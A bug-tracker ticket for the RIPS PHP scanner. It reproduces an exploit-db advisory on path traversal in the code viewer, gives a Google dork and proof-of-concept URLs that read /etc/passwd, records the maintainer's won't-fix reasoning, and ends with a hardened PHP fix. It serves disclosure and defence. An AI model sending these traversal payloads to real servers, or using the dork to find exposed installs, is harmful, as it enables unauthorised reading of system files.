#12 Multiple Local File Inclusion Vulnerabilities

open-wont-fix
nobody
None
5
2012-04-09
2012-03-29
regenpijp
No

Just a copy-paste from exploit-db
http://www.exploit-db.com/exploits/18660/

# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities
# Google Dork: allintitle: "RIPS - A static source code analyser for vulnerabilities in PHP scripts"
# Although this script is not intended to be accessible from the internet, there are some websites that host it.
# Download: http://sourceforge.net/projects/rips-scanner/
# Date: 23/03/12
# Contact: ***@gmail.com
# Follow: @***
# www.***.com.ar

File: /windows/code.php

102: file $lines = file($file);
96: $file = $_GET['file'];

PoC:
http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

File: /windows/function.php

64: file $lines = file($file);
58: $file = $_GET['file'];

PoC:
http://localhost/rips/windows/function.php?file=../../../../../../etc/passwd (will read the first line of the file)

Discussion

  • regenpijp (2012-03-29)

    • priority: 5 --> 7

  • regenpijp (2012-03-31)

    • priority: 7 --> 5

  • Johannes Dahse (2012-04-09)

    • status: open --> open-wont-fix

  • Johannes Dahse (2012-04-09)

    I have discussed this several times, thank you for reporting. Of course I know about this issue because (like the "exploit" author did) I tend to use RIPS against its own source. Here are the key facts:

    1) It is not a file inclusion, it is a file disclosure (the "exploit" author should at least use the help function of RIPS to read what the important difference is)
    2) a file disclosure is absolutely the sense of the code VIEWER
    3) RIPS is a local tool; just because it runs on a webserver doesn't mean it is intended for the www. This hint is also given on the startup page
    4) I can not limit the file extension of included files to a fixed list, because it can be anything or even empty

    summary:
    Of course if you give someone access to your local file scanner tool he can read your local files, so I do not intend to fix this. It's like giving someone access to your metasploit webinterface and worrying about command execution, or access to your phpmyadmin interface and worrying about sql injection. I expect the user of RIPS to have at least a slight interest in security and to be clever enough to not install RIPS on a public webserver, or to read the startup hints.

    Other than that it is absolutely legit to report this issue or make an advisory about it to raise awareness or find security issues. However, the claim that it is a file inclusion vulnerability (that can be avoided in all cases) brings some bad press to the tool ;)

    I leave this topic open for discussion.
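For readers who do want to run the code viewer somewhere other than a fully trusted local box, the following is an added example (not RIPS's own code, and not a patch the maintainer endorsed) showing a hardened variant of the `/windows/code.php` pattern quoted in the report. It addresses point 4 above: instead of an extension allowlist, which cannot work for a source viewer, it confines the viewer to the directory that was submitted for scanning. `SCAN_ROOT` and `resolveInsideRoot()` are hypothetical names introduced here, POSIX paths are assumed, and the root would in practice come from server-side configuration or session state rather than the request.

```php
<?php
// Added example, not RIPS's own code: hardened variant of the reported
// /windows/code.php pattern, which does
//     $file  = $_GET['file'];
//     $lines = file($file);
// and therefore reads any file the web server user can open.
// Rather than an extension allowlist (which, as the maintainer notes,
// cannot work for a source viewer), confine the viewer to the directory
// that was submitted for scanning.

// Hypothetical: the project root chosen when the scan was started. A real
// deployment would take this from config or session state, never from the
// request itself.
define('SCAN_ROOT', '/var/www/scan-target');

/**
 * Resolve $requested (absolute, or relative to $root) to a canonical path
 * and return it only if it is a regular file inside $root; otherwise null.
 * realpath() collapses '..' and follows symlinks, so '../../etc/passwd'
 * and a symlink pointing outside the tree are both rejected, whatever the
 * file extension. POSIX path separators are assumed.
 */
function resolveInsideRoot(string $root, string $requested): ?string
{
    $root = realpath($root);
    if ($root === false) {
        return null;                        // root itself does not exist
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR);

    $isAbsolute = strncmp($requested, DIRECTORY_SEPARATOR, 1) === 0;
    $candidate  = realpath($isAbsolute ? $requested
                                       : $root . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;                        // missing, or not a regular file
    }
    // Compare with the trailing separator included so that a sibling such
    // as '/var/www/scan-target-old/x.php' is not accepted for root
    // '/var/www/scan-target'.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$path = resolveInsideRoot(SCAN_ROOT, $_GET['file'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('file must be an existing file inside the scanned project');
}

// Still file(), not include(): the viewer reads source, it never executes
// it, which is exactly the disclosure-vs-inclusion distinction drawn above.
foreach (file($path, FILE_IGNORE_NEW_LINES) as $n => $line) {
    printf("%d: %s\n", $n + 1, htmlspecialchars($line, ENT_QUOTES, 'UTF-8'));
}
```

The containment check is the only part that matters for the reported traversal: with `SCAN_ROOT` set to the scanned project, `?file=../../../../../../etc/passwd` resolves to a path outside the prefix and is refused, while every file of the project, with any extension or none, remains viewable. It does not change the maintainer's point that the tool is meant to run locally; a viewer bound to a loopback address and never exposed to the internet is still the primary control, and the check above is defence in depth for the case where that advice is ignored.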